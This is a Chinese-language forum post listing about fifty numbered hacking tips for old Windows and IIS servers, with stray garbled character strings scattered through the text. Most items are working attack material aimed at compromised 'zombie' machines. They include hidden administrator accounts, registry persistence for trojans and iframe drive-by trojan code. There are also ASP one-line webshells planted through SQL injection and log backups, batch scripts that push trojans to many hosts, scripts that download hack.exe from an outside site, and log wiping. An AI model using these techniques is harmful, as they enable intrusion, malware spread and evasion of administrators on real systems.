1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,2 F* Z( @1 c0 t. e- a
cacls C:\windows\system32 /G hqw20:R0 ~7 N) U* `! K0 y
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
0 Y+ L- m, w a f) D恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
& s& Z: U/ M, k5 j, ?: Y: L& G
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。3 e6 e- o: {+ A
# r; k& l( w- e
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。5 e! {; t5 [+ ?
: V) Z% o6 w$ u1 i c* K' x. y4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号/ U a! A+ Q5 A+ o9 f
) I+ i+ A! X' [% y# Y" E2 _
5、利用INF文件来修改注册表
[& h) H2 h: G' C+ ^[Version]5 ^0 Y% J6 I0 _6 U" |' H
Signature="$CHICAGO$"
' ?- j! g% a+ H3 ]8 Q6 w* A g[Defaultinstall]; h3 g- K6 H, L; L! [3 {( H
addREG=Ating
) p$ A) I* O% M) K- E( H8 f7 A( E[Ating]
: T/ Y7 z' i7 |* i" u- B' MHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
2 g/ i7 Z4 p- o, G% [# b以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:# s% D& a1 Y( C
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径6 |! X* M* \7 c2 c% @
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU# f: u k6 d; y9 d
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
- @8 f( ~ j1 J& L* QHKEY_CURRENT_CONFIG 简写为 HKCC! s* ?3 W( [- V# Q9 p
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值$ @+ I1 m" E+ j1 g
"1"这里代表是写入或删除注册表键值中的具体数据
, i' C7 P/ a4 `2 u; o9 x- v5 W+ Q z6 y6 F
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
( L% K# ^( T V- m$ z! s多了一步就是在防火墙里添加个端口,然后导出其键值/ d) n. ^+ K5 ], x/ G1 M2 \
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]/ t5 F* _) B' Y5 A! V+ p
- v2 A$ T8 w$ V/ [7 [! w8 w7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽0 I9 k$ s _$ e
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
- S, L$ x% N. Q- v& U' R% ~6 Z ^1 i2 i' W& b1 G0 @( D6 C. v
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
! \- b+ k; W9 N; K' X) j5 d; G
" @% A5 @" q1 {6 E& M' M% ^! U w9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
# f* j) T! O% f% ^可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
. S+ d8 R& V9 B; ]0 i- U
* M* D0 }' S* A8 T) Z1 a, l' @10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”1 K. j$ Y1 x. g4 z
; T' A2 a5 _! y; U11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,, F( N+ d" c# W2 ]4 y( r7 B2 k% r
用法:xsniff –pass –hide –log pass.txt. n, Y( u0 M3 _' |& {5 n! _
0 G3 ~: @# \4 X* A
12、google搜索的艺术: p' ]4 n1 j' N9 o( A# {2 y4 W
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
1 B C$ _( Z7 f- N3 h或“字符串的语法错误”可以找到很多sql注入漏洞。5 e; r/ |0 f0 u& ~/ E" t+ W) V0 Z# X
" Z4 i2 a+ {5 Y9 t+ N& a3 O% Q8 C
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
2 V; w! r1 M6 F2 `. T8 a$ T, k# r; S
14、cmd中输入 nc –vv –l –p 1987
. |: Y8 N' V3 l' j. i8 g做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
& r6 L9 P# F4 m2 {" k7 d
4 {# _1 V3 x' M5 Z/ R5 L% H15、制作T++木马,先写个ating.hta文件,内容为
! W$ y6 [+ l0 Q8 i2 P+ u<script language="VBScript">1 d, y ], M+ _2 g& M+ X) h) i
set wshshell=createobject ("wscript.shell" )& E& E7 V( x- l# i1 x8 B! e; P" T
a=wshshell.run("你马的名称",1)
9 Y. J% U+ _8 \/ h, t2 |( Z2 a2 Vwindow.close
/ M2 T/ {, r1 ~ Z) N9 g</script> A. X3 }# q: O7 n% M
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。9 x8 v; e# Y$ B4 [" x
6 g' y& K! Z$ U6 k9 S16、搜索栏里输入
, P) U( Z' H' T- f4 n/ s& w关键字%'and 1=1 and '%'='! K- R. W8 c/ ?* R
关键字%'and 1=2 and '%'='2 @5 P4 C4 }3 J# t
比较不同处 可以作为注入的特征字符
9 t* A) ^/ y4 ]2 z
g# Q1 ~3 V3 r% ~! {17、挂马代码<html>
7 Z* h$ p2 T, y<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe># v3 L4 J) ~( L3 r! v
</html>, Z9 Q' \0 {* e/ a7 ?% f
1 v0 f3 i+ q0 {1 R$ [
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
1 |, f9 [8 }' o) A7 {; rnet localgroup administrators还是可以看出Guest是管理员来。* b: X: K( S; _3 s
8 }' L" c/ f" A0 t19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
@- j" ?# B% ?; f用法: 安装: instsrv.exe 服务名称 路径' O/ R" w8 J" ?+ W% f- |+ Y
卸载: instsrv.exe 服务名称 REMOVE
$ R$ c! [* d, D/ v3 N! g7 @9 R' D
: Z( k7 ~. F1 J3 t7 n* I
9 ?3 y8 T& _0 q; e21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉9 e8 m, {; f! A5 M1 y% `4 F
不能注入时要第一时间想到%5c暴库。; c* ^' B* I1 T! D- ]0 N% `
1 r* t4 L E2 P7 H3 @22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
" r9 ?$ B. I( l$ a
* G: ?5 r- j9 g6 a* E( m4 P5 d! v23、缺少xp_cmdshell时% p5 T! [& [5 Y1 S( p$ m
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll': v; c z: R, ]* i8 ?4 s
假如恢复不成功,可以尝试直接加用户(针对开3389的)0 }& M; r) n+ D7 K! ]3 Y
declare @o int
1 O D4 s3 Q3 R3 N; S& |$ |( zexec sp_oacreate 'wscript.shell',@o out
9 ?& ?6 y0 `0 G$ Fexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员0 A0 k4 g/ i* Z+ L
$ C) \6 o0 `% f
24.批量种植木马.bat) g2 e4 X, v% y4 D) W
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中0 R+ H, T- q6 d" r1 o
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间7 w7 ]6 h' ]3 a$ P- N
扫描地址.txt里每个主机名一行 用\\开头
+ R$ H1 |+ }+ E$ ?; E- k2 h/ K _& v
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
* f) \- s/ A1 S* F. ~
0 v! M' O! L5 d" q$ Y- X1 e+ e' a26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.9 G- {/ t) h: x* ?: B
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.. L y0 H7 V2 Q& ~. ~# w
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
8 v2 o# u$ i$ [6 `
, l' W% z4 ]* J4 n/ v6 \7 b. {27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP) B, @2 e& z5 `
然后用#clear logg和#clear line vty *删除日志
! c4 m1 C( F, O6 o3 ~& t7 U- w- | b+ R& U
28、电脑坏了省去重新安装系统的方法0 I; J, Z- b1 C) h$ z
纯dos下执行,
/ W: _- K9 N* k2 g3 n3 N6 ^6 V' Jxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config% U7 K. u2 I. t7 o* \
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
* C S: ^" @: l% |3 l* z
5 `; e# d* ~. r* m8 h$ A) L# r29、解决TCP/IP筛选 在注册表里有三处,分别是:
% n7 ^- H6 M" O0 y2 P# ^HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip+ I- \( i8 p6 y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
& e8 \2 B# N& f" `/ Z8 W0 sHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: G% j- S4 _" e5 V- c分别用
$ n2 }/ _9 A/ H/ j( @- zregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip$ V" M) y( a1 N0 S2 }
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
! j7 @. m5 M( p! T Zregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 ?6 }3 K. j1 G w命令来导出注册表项/ L0 v! h2 Y" ^
然后把三个文件里的EnableSecurityFilters"=dword:00000001,- m. g) M2 h# a' L+ `+ R/ }
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用/ M" @ x& X6 w8 T: z
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。, k" E, B3 m1 a1 s' F
. r8 z7 d& `6 q. k" N30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U& Y, d" D6 E4 g. s5 a& R( K
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的34 z) i7 a E! w
: F# |, m+ ?3 H& k4 |1 u31、全手工打造开3389工具
: S6 y. F- L" H) G打开记事本,编辑内容如下:
, u6 r/ S# I W* ]; M. F$ Pecho [Components] > c:\sql
# q/ V/ w; X; k. r' ?echo TSEnable = on >> c:\sql
0 Q' E7 x/ H) Y6 a( T- tsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
8 k' d* j1 h% ]* n( X编辑好后存为BAT文件,上传至肉鸡,执行& N" Y" {5 r8 z* d8 [9 J
& T0 }3 f! T) T3 Z) {: I$ p/ w6 W
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马5 I7 J4 y* z% n
. H' z6 m G9 ]6 n) ^9 q8 \
33、让服务器重启! e: q9 z7 y# f) p# W! E6 i
写个bat死循环:
* d; K3 n! x- O5 X3 i% J& V@echo off- {1 X2 I, z* U- y7 m1 B
:loop1$ r6 v. p1 k% n j0 F! Y! c
cls
; e1 `: B0 j7 L4 Ostart cmd.exe. I8 f7 G, f& s+ [
goto loop1/ }' S' w. G! A2 o4 l7 w1 F! R
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
1 I$ ~% k1 D$ G9 I7 Y- a; C8 Y+ L7 J
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,9 s4 U' ?9 O4 M+ G' W7 M
@echo off
0 v4 a6 ~& t0 A, Z# a' ?: J% Xdate /t >c:/3389.txt( V8 }# u4 t, H, F
time /t >>c:/3389.txt
% E+ _* ?$ x4 n% j: eattrib +s +h c:/3389.bat
8 z' g) D X; `% rattrib +s +h c:/3389.txt. p+ S7 N3 g8 A$ }& p! w
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
$ ^5 {) ^6 h: N5 x% ^" J6 v并保存为3389.bat% I C9 y# u8 H! g/ w G x
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号* h4 l3 t# j, A9 V+ I5 b
6 [) y# x# i/ ^1 y z7 p( s9 |, }
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
5 q+ B3 R* {; |, p8 h# ~0 c4 L: wstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
) C5 @4 _6 r5 v; ^/ b. l0 w! q输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。5 z- I% F* W0 ]$ f
2 v% w' Y' y" [' A& v- t" y( p: q% c36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件; U: i3 z4 c" j& N
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
4 v" G& x7 t/ X1 ?echo 你的FTP账号 >>c:\1.bat //输入账号3 |1 j q; f3 l, M
echo 你的FTP密码 >>c:\1.bat //输入密码+ C1 j9 {# s/ w7 I8 ^6 ~4 {
echo bin >>c:\1.bat //登入
3 S* U. w' C1 t3 }echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么' C2 t9 d. R9 O( Y# t
echo bye >>c:\1.bat //退出
C2 _4 x5 {: _) o: ]7 O然后执行ftp -s:c:\1.bat即可
8 X5 h8 I& T5 E/ S9 W; R1 ?3 w% z& H( p5 b6 Y* q( F; @
37、修改注册表开3389两法
; R( {" o+ \1 E) H0 e7 o3 @9 d) y(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
0 ~, E7 N4 D2 w4 r0 @4 u0 ^) secho Windows Registry Editor Version 5.00 >>3389.reg6 Y" i; g8 {8 M; n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
% \( f# \2 Z5 n7 F- Vecho "Enabled"="0" >>3389.reg
* c! t3 Q! `: ~0 u0 Y5 V3 z# h, h2 Pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows* e6 Y+ I. Q' |9 P% q
NT\CurrentVersion\Winlogon] >>3389.reg
7 Z& f6 t) D$ ]+ X7 h- }echo "ShutdownWithoutLogon"="0" >>3389.reg
[% k2 j/ S0 K2 }" H2 necho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]8 |9 o% ?# [4 k2 B6 Z
>>3389.reg
# [7 D; ^. T: Uecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg& `- \% ?( I& h& X0 X* v: F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
! ]8 n% P! q& T6 x# P>>3389.reg
2 Y T8 T. X% A$ v" [echo "TSEnabled"=dword:00000001 >>3389.reg+ G2 ^1 _- k6 x: I, v. D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
2 L; v" o0 c' ^: _echo "Start"=dword:00000002 >>3389.reg
" A- [2 H' K/ Q, O# B4 v: Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]; T. I% z3 u5 F3 _& l
>>3389.reg$ q5 q3 x* _4 @' b6 g
echo "Start"=dword:00000002 >>3389.reg
S+ x* d o+ s: c! l G- }1 Q8 Fecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
: n4 w. ^, Q' o# becho "Hotkey"="1" >>3389.reg/ h6 y0 I3 N" ^2 L7 ^* W9 P$ B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# S8 O2 p- m0 z+ x7 L% `+ M
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
) m" b+ h7 Y" y' ?' t H/ G+ S9 lecho "PortNumber"=dword:00000D3D >>3389.reg
- r) P. P; e8 P; xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 z+ ?+ `" H9 z4 o4 r7 o. T6 WServer\WinStations\RDP-Tcp] >>3389.reg
" S1 c/ e9 M0 T- ]* d4 x: secho "PortNumber"=dword:00000D3D >>3389.reg a% v( K6 |* U
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。- L2 l6 ?2 e' U c
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)% c) A' L7 b, Y, Q; ^
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效/ L$ |% ~& {$ f0 ]% C1 `% N
(2)winxp和win2003终端开启
5 O4 f8 a4 [* \用以下ECHO代码写一个REG文件:
0 p3 s U) C% V* u/ Eecho Windows Registry Editor Version 5.00>>3389.reg2 d$ ^ A6 D \6 p4 o/ N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 @3 }. i4 r3 K& q, F
Server]>>3389.reg/ W6 Y6 }& O3 t7 Z2 M
echo "fDenyTSConnections"=dword:00000000>>3389.reg
- h/ P" ^0 S: ]4 r/ y0 mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ ?% i- `: t4 k" H' a6 \; }
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
0 K o) v" }% X6 xecho "PortNumber"=dword:00000d3d>>3389.reg
H* m" j1 k* qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) `& e, D8 o% E4 z+ b
Server\WinStations\RDP-Tcp]>>3389.reg9 x0 Z* D% e/ V) d1 ]+ y7 N1 n/ B2 t* i
echo "PortNumber"=dword:00000d3d>>3389.reg
2 ~+ O/ O: O, L! q& `& U+ Z然后regedit /s 3389.reg del 3389.reg
6 S! e( t! S K" ]" f. }5 EXP下不论开终端还是改终端端口都不需重启
" c: w4 V6 _+ _" V6 _* e" Y# f( x2 X- C J$ x& c* `, s
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
- X; B$ M9 i# f& W9 V用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'! B3 a$ h/ H$ e! ]; A( }- s, Z
% p9 a, E' q% o; q39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
5 j+ I" K9 |# D: X' g(1)数据库文件名应复杂并要有特殊字符
) N6 f7 g* w+ I; @: x(2)不要把数据库名称写在conn.asp里,要用ODBC数据源6 S; X4 U4 b5 v1 ?
将conn.asp文档中的8 K6 i1 X# y/ C" B! W9 |
DBPath = Server.MapPath("数据库.mdb")! r* D# z! L( H
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath0 ?+ ~3 [! `+ E$ S" _ z) R* I
4 \8 w) R: N! q% L修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
% c. z g5 N3 {) M6 ^/ Q) U(3)不放在WEB目录里
- p9 L) |: {5 v, G4 v0 y4 x H" w' ^% V7 g4 l
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
. ]5 P U3 ]' S) q可以写两个bat文件6 k0 H1 _/ w% |* o
@echo off9 c2 a( A8 }; u$ k5 T
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
. g: F& g/ I" |3 R; U@del c:\winnt\system32\query.exe
2 y) S4 J7 u6 S" I8 U" m@del %SYSTEMROOT%\system32\dllcache\query.exe4 S( H3 W6 _3 `
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
; {$ Y! L5 E: F* P& t# u% T V5 s) m* E% x1 k
@echo off
" p* I+ A) }8 S! O3 z% [+ K@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe: v3 ]0 u7 R' _* g( Q. A* O" X
@del c:\winnt\system32\tsadmin.exe# e/ D: K5 i$ f- ?
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex: j7 q" O' r) Q9 F: E* j
. U/ Y/ \4 R8 Y3 p2 r# A1 K7 }$ h" Z' Z; n
41、映射对方盘符5 t* }0 N3 G) c8 z. `/ M4 J, k
telnet到他的机器上,( P& F. o0 w# U2 A8 \
net share 查看有没有默认共享 如果没有,那么就接着运行4 P# S- x2 Z* O1 T; i
net share c$=c:( e: j3 X* `- I" [& B% g
net share现在有c$
5 i" A# r" S7 t+ G3 g在自己的机器上运行
: E. f) R2 _0 D( `+ \6 m# B7 Bnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K8 O3 C. G# m0 H& ^. N. d
8 r$ b$ b* ^' f* U- ~42、一些很有用的老知识
2 I( V9 _* [7 B8 o: H- H+ O. Xtype c:\boot.ini ( 查看系统版本 ). _( o2 I# S' N5 z- v9 `
net start (查看已经启动的服务)) s0 }- P1 X7 b0 i8 }" B
query user ( 查看当前终端连接 )/ p* i5 Z6 E" l7 o" ~2 }
net user ( 查看当前用户 )3 g6 U& m% N7 y9 s8 z6 E
net user 用户 密码/add ( 建立账号 )4 c- ^3 i# o$ q3 b8 U
net localgroup administrators 用户 /add (提升某用户为管理员)
8 y7 X; O6 t, a$ @7 Bipconfig -all ( 查看IP什么的 )% X, A5 u* S" S& X
netstat -an ( 查看当前网络状态 )3 `/ E& s7 B G. h: |/ a2 z
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
1 @& K( L) r. x" N! C克隆时Administrator对应1F4% p. z7 j5 }# _1 y1 ?: q
guest对应1F55 |, A# ]& h+ R- \5 f
tsinternetuser对应3E83 L2 W3 ?" [6 W0 y: |
) g- h) c3 P8 s. {2 f0 S7 N+ z2 v
43、如果对方没开3389,但是装了Remote Administrator Service+ {7 H) |5 Z! k2 ?4 z' }6 d! i9 w+ k6 _0 H ^
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接+ x& k2 b+ _; Q) A3 x
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
5 m# r% R0 f2 p, Y$ ^* `! R先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"+ d3 C. D# ]5 v' M3 `8 C
1 J2 ^$ a" |2 S1 d" ~6 H7 @44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
) q/ e7 d! N8 X \# p) W本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
/ G# m* X: u3 Q7 N. p" n' t& D& I3 T# Z) r
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
. h& \1 \$ C7 `echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open$ S4 `( `$ t5 K9 B1 z; R* O8 h
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =4 x2 J4 ^4 p4 I2 h
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =" A' t1 ?$ \% ]2 Q8 v( H
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
" J3 U/ n# P; J1 ^& l: t(这是完整的一句话,其中没有换行符)
4 j* V2 L) a( j& r! h3 m1 P然后下载:
- v! @+ n/ C4 I; h, y# ucscript down.vbs http://www.hack520.org/hack.exe hack.exe
0 [) g( Q" P0 A) m. l
" K6 [ a/ A a/ ~: x: }5 z46、一句话木马成功依赖于两个条件:
$ ^! _& q9 l1 z, S0 s0 r4 i1、服务端没有禁止adodb.Stream或FSO组件
: [+ r1 r- F8 l! L, J& B4 w$ a3 B( G2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。# X4 S+ Y3 s5 n
0 F3 d# d7 M1 S47、利用DB_OWNER权限进行手工备份一句话木马的代码:3 T1 n# Y6 X+ ?+ z- K
;alter database utsz set RECOVERY FULL--7 Y+ O$ k6 }7 y" c. u; S
;create table cmd (a image)--
& c6 Z5 s6 P. D' O, x$ R5 T/ w;backup log utsz to disk = 'D:\cmd' with init--2 Q% _- @$ ]( [+ P8 W/ f/ B8 W5 M p
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
; f7 c' ?0 U* F" U8 D;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--& Y5 K+ t; Q( o% {. H6 {
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
( r) D+ y8 }* o0 x9 |
# t& k) P) Z6 ]) j) w9 ~48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:; d* X8 l7 L0 ~! o" S- Z, c. i0 n
0 S- K! S4 {. |- z& ]! i2 q用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options8 y5 s+ G, e- H' q! n
所有会话用 'all'。
& _) S( s0 J% N7 \' f-s sessionid 列出会话的信息。
- U" A( ]2 b: ^8 C- f+ a/ v-k sessionid 终止会话。
9 d8 y( D9 R: O/ Z- G- R* K; s0 Z3 a+ {-m sessionid 发送消息到会话。4 d5 B- v9 ?/ Z! F# s# Q
8 Z9 \4 `: x% l& k( a) l* oconfig 配置 telnet 服务器参数。
# @# j( O# K* |$ q9 H7 M" s% T- ~8 Q" [# c/ [8 p5 G
common_options 为:* {( @4 B& y1 |- @ v
-u user 指定要使用其凭据的用户- U5 n/ W( ~2 m3 _& {, [ {
-p password 用户密码, v! `) ^# r8 w$ j( u6 u5 C
# T2 i* X% [$ K" p8 K: lconfig_options 为:
, b- _7 K- T9 @/ bdom = domain 设定用户的默认域+ Q6 @; z9 `6 p* V$ u* b
ctrlakeymap = yes|no 设定 ALT 键的映射2 n+ y, A& N/ P6 g& }
timeout = hh:mm:ss 设定空闲会话超时值, {$ l7 W3 g" j0 F3 [) F! C( z& Q
timeoutactive = yes|no 启用空闲会话。
' y2 K. i' X0 R6 pmaxfail = attempts 设定断开前失败的登录企图数。
6 l" f- [6 o5 R0 L" e8 Hmaxconn = connections 设定最大连接数。
3 ?" }- @: u: P- }* f2 P6 Sport = number 设定 telnet 端口。1 }1 E0 Q2 D8 u5 q
sec = [+/-]NTLM [+/-]passwd7 f/ ?9 m# z' C Z* [
设定身份验证机构/ i* {( B: u7 W- T+ p
fname = file 指定审计文件名。$ [' l; @& w- k. Z! H7 \- u* W: i0 H
fsize = size 指定审计文件的最大尺寸(MB)。8 E* p u" X9 _) F
mode = console|stream 指定操作模式。
6 l" l2 h! u4 d. Z+ R, `$ K: Hauditlocation = eventlog|file|both
0 Y) a6 K7 \) D4 l7 D8 y, J指定记录地点
2 c9 ?2 M4 u. Gaudit = [+/-]user [+/-]fail [+/-]admin7 U/ N/ x4 e1 D1 ~0 a
( [* T* z T4 Z8 a! \49、例如:在IE上访问:
6 f i# m( _; r, F4 h( Swww.hack520.org/hack.txt就会跳转到http://www.hack520.org// ~1 f9 _' |: ]4 u
hack.txt里面的代码是:7 R) l. P# H/ o( g A% c
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
+ ^3 a: ]) O( l/ K& z9 |把这个hack.txt发到你空间就可以了!
& `9 F' J( ^+ j+ d这个可以利用来做网马哦!, s7 {( b+ f0 q0 v* Q' P: @
! t) e. c }$ |$ J( A2 d50、autorun的病毒可以通过手动限制!- f1 a' W1 ]/ f. q; S' x( l( A/ a, a
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!; M6 J! d; Z+ R0 V
2,打开盘符用右键打开!切忌双击盘符~( H1 z, _/ J$ F( J5 b4 p) Z
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!. m# @; j h' c2 d* K6 t" E
; X' i# ^" P1 d) j9 U$ F
51、log备份时的一句话木马:& U( T9 ~4 B% w, \
a).<%%25Execute(request("go"))%%25>
& S$ O3 P; k9 l+ ^. e# d/ p+ Fb).<%Execute(request("go"))%>
- a4 G; r; r$ Qc).%><%execute request("go")%><%
8 ^5 q7 f# k* ]) Hd).<script language=VBScript runat=server>execute request("sb")</Script>
; a' W! B" |( A2 p+ Ve).<%25Execute(request("l"))%25>) x! o7 r% z; a1 p" ~/ u3 R
f).<%if request("cmd")<>"" then execute request("pass")%>: ?2 | `9 Z4 I/ \& j1 r" D! `& {
. ^' L' ?- s& T3 |
52、at "12:17" /interactive cmd0 _; l1 V) g* I
